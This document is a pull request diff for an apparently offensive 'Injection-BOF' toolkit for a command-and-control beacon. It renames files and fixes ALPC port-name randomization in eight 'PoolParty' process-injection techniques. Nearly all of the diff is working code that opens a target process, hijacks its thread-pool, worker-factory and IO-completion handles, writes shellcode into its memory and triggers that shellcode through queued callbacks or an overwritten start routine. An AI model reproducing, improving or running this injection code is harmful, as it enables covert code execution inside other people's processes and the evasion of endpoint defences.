### PR TITLE
Injection-BOF poolparty file names and bug fixes.

### DIFF
--- a/Injection-BOF/inject_poolparty/1.h
+++ b/Injection-BOF/inject_poolparty/1.h
@@ -1,89 +1,30 @@
 #include "PoolParty.h"
 
-#define POOL_PARTY_ALPC_PORT_NAME L"\\RPC Control\\Adaptix"
-#define INIT_UNICODE_STRING(str) { sizeof(str) - sizeof((str)[0]), sizeof(str) - sizeof((str)[0]), (PWSTR)(str) }
-#define POOL_PARTY_POEM "Dive right in and make a splash,\n" \
-                        "We're throwing a pool party in a flash!\n" \
-                        "Bring your swimsuits and sunscreen galore,\n" \
-                        "We'll turn up the heat and let the good times pour!\n"
+void WorkerFactoryStartRoutineOverwrite(HANDLE hTarget, CHAR* shellcode, SIZE_T shellcodeSize) {
+    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
+    _NtSetInformationWorkerFactory NtSetInformationWorkerFactory = (_NtSetInformationWorkerFactory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetInformationWorkerFactory"));
+    
+    WORKER_FACTORY_BASIC_INFORMATION WorkerFactoryInformation = GetWorkerFactoryBasicInformation();
 
-void RemoteTpAlpcInsertionSetupExecution(HANDLE hTarget, LPVOID pShellcodeAddress) {
-	_NtAlpcCreatePort NtAlpcCreatePort = (_NtAlpcCreatePort)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAlpcCreatePort"));
-	_TpAllocAlpcCompletion TpAllocAlpcCompletion = (_TpAllocAlpcCompletion)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "TpAllocAlpcCompletion"));
-	_NtAlpcSetInformation NtAlpcSetInformation = (_NtAlpcSetInformation)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAlpcSetInformation"));
-	_NtAlpcConnectPort NtAlpcConnectPort = (_NtAlpcConnectPort)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAlpcConnectPort"));
+    DWORD dwOldProtect = NULL;
+    KERNEL32$VirtualProtectEx(hTarget, WorkerFactoryInformation.StartRoutine, shellcodeSize, PAGE_READWRITE, &dwOldProtect);
 
-	HANDLE hTempAlpcConnectionPort;
-	NTSTATUS Ntstatus = NtAlpcCreatePort(&hTempAlpcConnectionPort, NULL, NULL);
-	
-	PFULL_TP_ALPC pTpAlpc = { 0 };
-	Ntstatus = TpAllocAlpcCompletion(&pTpAlpc, hTempAlpcConnectionPort, (PTP_ALPC_CALLBACK)(pShellcodeAddress), NULL, NULL);
-	
-	UNICODE_STRING usAlpcPortName = INIT_UNICODE_STRING(POOL_PARTY_ALPC_PORT_NAME);
+    NTSTATUS Ntstatus = NtWriteVirtualMemory(hTarget, WorkerFactoryInformation.StartRoutine, shellcode, shellcodeSize, NULL);
+    KERNEL32$VirtualProtectEx(hTarget, WorkerFactoryInformation.StartRoutine, shellcodeSize, dwOldProtect, &dwOldProtect);
+    ULONG WorkerFactoryMinimumThreadNumber = WorkerFactoryInformation.TotalWorkerCount + 1;
 
-	OBJECT_ATTRIBUTES AlpcObjectAttributes = { 0 };
-	AlpcObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
-	AlpcObjectAttributes.ObjectName = &usAlpcPortName;
+    Ntstatus = NtSetInformationWorkerFactory(hTpWorkerFactory, WorkerFactoryThreadMinimum, &WorkerFactoryMinimumThreadNumber, sizeof(ULONG));
 
-	ALPC_PORT_ATTRIBUTES AlpcPortAttributes = { 0 };
-	AlpcPortAttributes.Flags = 0x20000;
-	AlpcPortAttributes.MaxMessageLength = 328;
-
-	HANDLE hAlpcConnectionPort;
-	Ntstatus = NtAlpcCreatePort(&hAlpcConnectionPort, &AlpcObjectAttributes, &AlpcPortAttributes);
-	
-	PFULL_TP_ALPC pRemoteTpAlpc = (PFULL_TP_ALPC)(KERNEL32$VirtualAllocEx(hTarget, NULL, sizeof(FULL_TP_ALPC), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE));
-	KERNEL32$WriteProcessMemory(hTarget, pRemoteTpAlpc, pTpAlpc, sizeof(FULL_TP_ALPC), NULL);
-	
-	ALPC_PORT_ASSOCIATE_COMPLETION_PORT AlpcPortAssociateCopmletionPort = { 0 };
-	AlpcPortAssociateCopmletionPort.CompletionKey = pRemoteTpAlpc;
-	AlpcPortAssociateCopmletionPort.CompletionPort = hIoCompletion;
-	NtAlpcSetInformation(hAlpcConnectionPort, AlpcAssociateCompletionPortInformation, &AlpcPortAssociateCopmletionPort, sizeof(ALPC_PORT_ASSOCIATE_COMPLETION_PORT));
-	
-	OBJECT_ATTRIBUTES AlpcClientObjectAttributes = { 0 };
-	AlpcClientObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
-
-	const char* Buffer = POOL_PARTY_POEM;
-	int BufferLength = sizeof(Buffer);
-
-	ALPC_MESSAGE ClientAlpcPortMessage = { 0 };
-	ClientAlpcPortMessage.PortHeader.u1.s1.DataLength = BufferLength;
-	ClientAlpcPortMessage.PortHeader.u1.s1.TotalLength = sizeof(PORT_MESSAGE) + BufferLength;
-	memcpy(ClientAlpcPortMessage.PortMessage, Buffer, sizeof(ClientAlpcPortMessage.PortMessage));
-	size_t szClientAlpcPortMessage = sizeof(ClientAlpcPortMessage);
-
-	/* NtAlpcConnectPort would block forever if not used with timeout, we set timeout to 1 second */
-	LARGE_INTEGER liTimeout = { 0 };
-	liTimeout.QuadPart = -10000000;
-	HANDLE hAlpc_;
-	NtAlpcConnectPort(
-		&hAlpc_,
-		&usAlpcPortName,
-		&AlpcClientObjectAttributes,
-		&AlpcPortAttributes,
-		0x20000,
-		NULL,
-		(PPORT_MESSAGE)&ClientAlpcPortMessage,
-		&szClientAlpcPortMessage,
-		NULL,
-		NULL,
-		&liTimeout);
 }
 
-void Inject5(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
-	_NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
-	
-	HANDLE hTarget = NULL;
-	DWORD dwOldProtect = NULL;
+void Inject1(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
+    HANDLE hTarget = NULL;
     hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);
     
-	if (hTarget) {
-		HijackIoCompletionHandle(hTarget, IO_COMPLETION_ALL_ACCESS);
-		PVOID pShellcodeAddress = KERNEL32$VirtualAllocEx(hTarget, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-		NtWriteVirtualMemory(hTarget, pShellcodeAddress, shellcode, shellcodeSize, NULL);
-		KERNEL32$VirtualProtectEx(hTarget, pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READ, &dwOldProtect);
-		RemoteTpAlpcInsertionSetupExecution(hTarget, pShellcodeAddress);
-	} else {
-		BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
-	}
+    if (hTarget) {
+        HijackTpWorkerFactoryHandle(hTarget, WORKER_FACTORY_ALL_ACCESS);
+        WorkerFactoryStartRoutineOverwrite(hTarget, shellcode, shellcodeSize);
+    } else {
+          BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
+      }
 }

--- a/Injection-BOF/inject_poolparty/2.h
+++ b/Injection-BOF/inject_poolparty/2.h
@@ -48,6 +48,6 @@ void Inject2(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
         
         RemoteTpWorkInsertion(hTarget, pShellcodeAddress);
     } else { 
-        BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
-    }
+          BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
+        }
 }

--- a/Injection-BOF/inject_poolparty/3.h
+++ b/Injection-BOF/inject_poolparty/3.h
@@ -1,7 +1,6 @@
 #include "PoolParty.h"
 
-void RemoteTpWaitInsertion(HANDLE hTarget, LPVOID pShellcodeAddress)
-{
+void RemoteTpWaitInsertion(HANDLE hTarget, LPVOID pShellcodeAddress) {
     _ZwAssociateWaitCompletionPacket ZwAssociateWaitCompletionPacket = (_ZwAssociateWaitCompletionPacket)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwAssociateWaitCompletionPacket"));
     _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
 
@@ -40,6 +39,6 @@ void Inject3(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
         
         RemoteTpWaitInsertion(hTarget, pShellcodeAddress);
     } else { 
-        BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
-    }
+          BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
+      }
 }

--- a/Injection-BOF/inject_poolparty/4.h
+++ b/Injection-BOF/inject_poolparty/4.h
@@ -50,13 +50,14 @@ void Inject4(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
 
         if (hTarget) {
                 HijackIoCompletionHandle(hTarget, IO_COMPLETION_ALL_ACCESS);
-
+                
                 PVOID pShellcodeAddress = KERNEL32$VirtualAllocEx(hTarget, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
                 NtWriteVirtualMemory(hTarget, pShellcodeAddress, shellcode, shellcodeSize, NULL);
                 KERNEL32$VirtualProtectEx(hTarget, pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READ, &dwOldProtect);
-
+                
                 RemoteTpIoInsertionSetupExecution(hTarget, pShellcodeAddress);
         } else {
                 BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
         }
+
 }

--- a/Injection-BOF/inject_poolparty/5.h
+++ b/Injection-BOF/inject_poolparty/5.h
@@ -1,30 +1,99 @@
 #include "PoolParty.h"
 
-void WorkerFactoryStartRoutineOverwrite(HANDLE hTarget, CHAR* shellcode, SIZE_T shellcodeSize) {
-    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
-    _NtSetInformationWorkerFactory NtSetInformationWorkerFactory = (_NtSetInformationWorkerFactory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetInformationWorkerFactory"));
+#define POOL_PARTY_ALPC_PORT_NAME_PREFIX L"\\RPC Control\\"
+#define PORT_NAME_LENGTH 9
+#define POOL_PARTY_POEM "Dive right in and make a splash,\n" \
+                        "We're throwing a pool party in a flash!\n" \
+                        "Bring your swimsuits and sunscreen galore,\n" \
+                        "We'll turn up the heat and let the good times pour!\n"
 
-    WORKER_FACTORY_BASIC_INFORMATION WorkerFactoryInformation = GetWorkerFactoryBasicInformation();
+void RemoteTpAlpcInsertionSetupExecution(HANDLE hTarget, LPVOID pShellcodeAddress) {
+        _NtAlpcCreatePort NtAlpcCreatePort = (_NtAlpcCreatePort)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAlpcCreatePort"));
+        _TpAllocAlpcCompletion TpAllocAlpcCompletion = (_TpAllocAlpcCompletion)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "TpAllocAlpcCompletion"));
+        _NtAlpcSetInformation NtAlpcSetInformation = (_NtAlpcSetInformation)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAlpcSetInformation"));
+        _NtAlpcConnectPort NtAlpcConnectPort = (_NtAlpcConnectPort)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAlpcConnectPort"));
 
-    DWORD dwOldProtect = NULL;
-    KERNEL32$VirtualProtectEx(hTarget, WorkerFactoryInformation.StartRoutine, shellcodeSize, PAGE_READWRITE, &dwOldProtect);
+        MSVCRT$srand((unsigned int)MSVCRT$time(NULL));
+        wchar_t* randomLetters = generateRandomLettersW(PORT_NAME_LENGTH);
+        size_t prefixLength = MSVCRT$wcslen(POOL_PARTY_ALPC_PORT_NAME_PREFIX);
+        size_t totalLength = prefixLength + PORT_NAME_LENGTH + 1;
+        wchar_t* portName = (wchar_t*)MSVCRT$malloc((MSVCRT$wcslen(POOL_PARTY_ALPC_PORT_NAME_PREFIX) + PORT_NAME_LENGTH + 1) * sizeof(wchar_t));
+        MSVCRT$wcscpy_s(portName, totalLength, POOL_PARTY_ALPC_PORT_NAME_PREFIX);
+        MSVCRT$wcscat_s(portName, totalLength, randomLetters);
+        wchar_t* POOL_PARTY_ALPC_PORT_NAME = portName;
 
-    NTSTATUS Ntstatus = NtWriteVirtualMemory(hTarget, WorkerFactoryInformation.StartRoutine, shellcode, shellcodeSize, NULL);
-    KERNEL32$VirtualProtectEx(hTarget, WorkerFactoryInformation.StartRoutine, shellcodeSize, dwOldProtect, &dwOldProtect);
-    ULONG WorkerFactoryMinimumThreadNumber = WorkerFactoryInformation.TotalWorkerCount + 1;
+        HANDLE hTempAlpcConnectionPort;
+        NTSTATUS Ntstatus = NtAlpcCreatePort(&hTempAlpcConnectionPort, NULL, NULL);
 
-    Ntstatus = NtSetInformationWorkerFactory(hTpWorkerFactory, WorkerFactoryThreadMinimum, &WorkerFactoryMinimumThreadNumber, sizeof(ULONG));
+        PFULL_TP_ALPC pTpAlpc = { 0 };
+        Ntstatus = TpAllocAlpcCompletion(&pTpAlpc, hTempAlpcConnectionPort, (PTP_ALPC_CALLBACK)(pShellcodeAddress), NULL, NULL);
 
+        UNICODE_STRING usAlpcPortName;
+        RtlInitUnicodeString(&usAlpcPortName, POOL_PARTY_ALPC_PORT_NAME);
+
+        OBJECT_ATTRIBUTES AlpcObjectAttributes = { 0 };
+        AlpcObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
+        AlpcObjectAttributes.ObjectName = &usAlpcPortName;
+
+        ALPC_PORT_ATTRIBUTES AlpcPortAttributes = { 0 };
+        AlpcPortAttributes.Flags = 0x20000;
+        AlpcPortAttributes.MaxMessageLength = 328;
+
+        HANDLE hAlpcConnectionPort;
+        Ntstatus = NtAlpcCreatePort(&hAlpcConnectionPort, &AlpcObjectAttributes, &AlpcPortAttributes);
+
+        PFULL_TP_ALPC pRemoteTpAlpc = (PFULL_TP_ALPC)(KERNEL32$VirtualAllocEx(hTarget, NULL, sizeof(FULL_TP_ALPC), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE));
+        KERNEL32$WriteProcessMemory(hTarget, pRemoteTpAlpc, pTpAlpc, sizeof(FULL_TP_ALPC), NULL);
+
+        ALPC_PORT_ASSOCIATE_COMPLETION_PORT AlpcPortAssociateCopmletionPort = { 0 };
+        AlpcPortAssociateCopmletionPort.CompletionKey = pRemoteTpAlpc;
+        AlpcPortAssociateCopmletionPort.CompletionPort = hIoCompletion;
+        NtAlpcSetInformation(hAlpcConnectionPort, AlpcAssociateCompletionPortInformation, &AlpcPortAssociateCopmletionPort, sizeof(ALPC_PORT_ASSOCIATE_COMPLETION_PORT));
+
+        OBJECT_ATTRIBUTES AlpcClientObjectAttributes = { 0 };
+        AlpcClientObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
+
+        const char* Buffer = POOL_PARTY_POEM;
+        int BufferLength = sizeof(Buffer);
+
+        ALPC_MESSAGE ClientAlpcPortMessage = { 0 };
+        ClientAlpcPortMessage.PortHeader.u1.s1.DataLength = BufferLength;
+        ClientAlpcPortMessage.PortHeader.u1.s1.TotalLength = sizeof(PORT_MESSAGE) + BufferLength;
+        memcpy(ClientAlpcPortMessage.PortMessage, Buffer, sizeof(ClientAlpcPortMessage.PortMessage));
+        size_t szClientAlpcPortMessage = sizeof(ClientAlpcPortMessage);
+
+        /* NtAlpcConnectPort would block forever if not used with timeout, we set timeout to 1 second */
+        LARGE_INTEGER liTimeout = { 0 };
+        liTimeout.QuadPart = -10000000;
+        HANDLE hAlpc_;
+        NtAlpcConnectPort(
+                &hAlpc_,
+                &usAlpcPortName,
+                &AlpcClientObjectAttributes,
+                &AlpcPortAttributes,
+                0x20000,
+                NULL,
+                (PPORT_MESSAGE)&ClientAlpcPortMessage,
+                &szClientAlpcPortMessage,
+                NULL,
+                NULL,
+                &liTimeout);
 }
 
-void Inject1(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
-    HANDLE hTarget = NULL;
-    hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);
+void Inject5(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
+        _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
 
-    if (hTarget) {
-        HijackTpWorkerFactoryHandle(hTarget, WORKER_FACTORY_ALL_ACCESS);
-        WorkerFactoryStartRoutineOverwrite(hTarget, shellcode, shellcodeSize);
-    } else {
-        BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
-    }
+        HANDLE hTarget = NULL;
+        DWORD dwOldProtect = NULL;
+        hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);
+
+        if (hTarget) {
+                HijackIoCompletionHandle(hTarget, IO_COMPLETION_ALL_ACCESS);
+                PVOID pShellcodeAddress = KERNEL32$VirtualAllocEx(hTarget, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+                NtWriteVirtualMemory(hTarget, pShellcodeAddress, shellcode, shellcodeSize, NULL);
+                KERNEL32$VirtualProtectEx(hTarget, pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READ, &dwOldProtect);
+                RemoteTpAlpcInsertionSetupExecution(hTarget, pShellcodeAddress);
+        } else {
+                BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
+        }
 }

--- a/Injection-BOF/inject_poolparty/6.h
+++ b/Injection-BOF/inject_poolparty/6.h
@@ -54,4 +54,5 @@ void Inject6(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
     } else {
         BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
     }
+
 }

--- a/Injection-BOF/inject_poolparty/7.h
+++ b/Injection-BOF/inject_poolparty/7.h
@@ -3,7 +3,7 @@
 void RemoteTpDirectInsertionSetupExecution(HANDLE hTarget, LPVOID pShellcodeAddress) {
     _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
     _ZwSetIoCompletion ZwSetIoCompletion = (_ZwSetIoCompletion)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwSetIoCompletion"));
-
+    
     TP_DIRECT Direct = { 0 };
     Direct.Callback = pShellcodeAddress;
 
@@ -16,20 +16,20 @@ void RemoteTpDirectInsertionSetupExecution(HANDLE hTarget, LPVOID pShellcodeAddr
 
 void Inject7(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
     _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
-
+    
     HANDLE hTarget = NULL;
     DWORD dwOldProtect = NULL;
 
     hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);
     if (hTarget) {
         HijackIoCompletionHandle(hTarget, IO_COMPLETION_ALL_ACCESS);
-
+        
         PVOID pShellcodeAddress = KERNEL32$VirtualAllocEx(hTarget, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
         NtWriteVirtualMemory(hTarget, pShellcodeAddress, shellcode, shellcodeSize, NULL);
         KERNEL32$VirtualProtectEx(hTarget, pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READ, &dwOldProtect);
-
+        
         RemoteTpDirectInsertionSetupExecution(hTarget, pShellcodeAddress);
-    } else {
-        BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
-    }
+    } else { 
+            BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
+        }
 }

--- a/Injection-BOF/inject_poolparty/8.h
+++ b/Injection-BOF/inject_poolparty/8.h
@@ -3,7 +3,7 @@
 void RemoteTpTimerInsertion(HANDLE hTarget, LPVOID pShellcodeAddress) {
     _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
     _NtSetTimer2 NtSetTimer2 = (_NtSetTimer2)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetTimer2"));
-
+    
     WORKER_FACTORY_BASIC_INFORMATION WorkerFactoryInformation = GetWorkerFactoryBasicInformation(hTpWorkerFactory);
     PFULL_TP_TIMER pTpTimer = (PFULL_TP_TIMER)KERNEL32$CreateThreadpoolTimer((PTP_TIMER_CALLBACK)(pShellcodeAddress), NULL, NULL);
     PFULL_TP_TIMER RemoteTpTimerAddress = (PFULL_TP_TIMER)(KERNEL32$VirtualAllocEx(hTarget, NULL, sizeof(FULL_TP_TIMER), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE));
@@ -34,11 +34,11 @@ void RemoteTpTimerInsertion(HANDLE hTarget, LPVOID pShellcodeAddress) {
 
 void Inject8(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
     _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
-
+    
     HANDLE hTarget = NULL;
     DWORD dwOldProtect = NULL;
     hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);
-
+    
     if (hTarget) {
         HijackTpWorkerFactoryHandle(hTarget, WORKER_FACTORY_ALL_ACCESS);
         HijackIRTimerHandle(hTarget, TIMER_ALL_ACCESS);
@@ -46,7 +46,7 @@ void Inject8(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
         PVOID pShellcodeAddress = KERNEL32$VirtualAllocEx(hTarget, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
         NtWriteVirtualMemory(hTarget, pShellcodeAddress, shellcode, shellcodeSize, NULL);
         KERNEL32$VirtualProtectEx(hTarget, pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READ, &dwOldProtect);
-
+        
         RemoteTpTimerInsertion(hTarget, pShellcodeAddress);
     } else {
         BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);

--- a/Injection-BOF/inject_poolparty/inject_poolparty.c
+++ b/Injection-BOF/inject_poolparty/inject_poolparty.c
@@ -19,14 +19,14 @@ void go(char * args, int len) {
     BeaconPrintf(CALLBACK_OUTPUT, "Selected technique: %d", technique);
 
     switch(technique) {
-        case 1: Inject1(pid, shellcode, shellcodeSize); break;
-        case 2: Inject2(pid, shellcode, shellcodeSize); break;
-        case 3: Inject3(pid, shellcode, shellcodeSize); break;
-        case 4: Inject4(pid, shellcode, shellcodeSize); break;
-        case 5: Inject5(pid, shellcode, shellcodeSize); break;
-        case 6: Inject6(pid, shellcode, shellcodeSize); break;
-        case 7: Inject7(pid, shellcode, shellcodeSize); break;
-        case 8: Inject8(pid, shellcode, shellcodeSize); break;
-        default: BeaconPrintf(CALLBACK_OUTPUT, "Invalid technique %d", technique);
+	case 1: Inject1(pid, shellcode, shellcodeSize); break;
+	case 2: Inject2(pid, shellcode, shellcodeSize); break;
+	case 3: Inject3(pid, shellcode, shellcodeSize); break;
+	case 4: Inject4(pid, shellcode, shellcodeSize); break;
+	case 5: Inject5(pid, shellcode, shellcodeSize); break;
+	case 6: Inject6(pid, shellcode, shellcodeSize); break;
+	case 7: Inject7(pid, shellcode, shellcodeSize); break;
+	case 8: Inject8(pid, shellcode, shellcodeSize); break;
+	default: BeaconPrintf(CALLBACK_OUTPUT, "Invalid technique %d", technique);
     }
 }


### PR DESCRIPTION
- 1.h and 5.h names swapped accordingly to the proper injection technique
- Fixed ALPC port name randomization to prevent beacon crashes in 5.h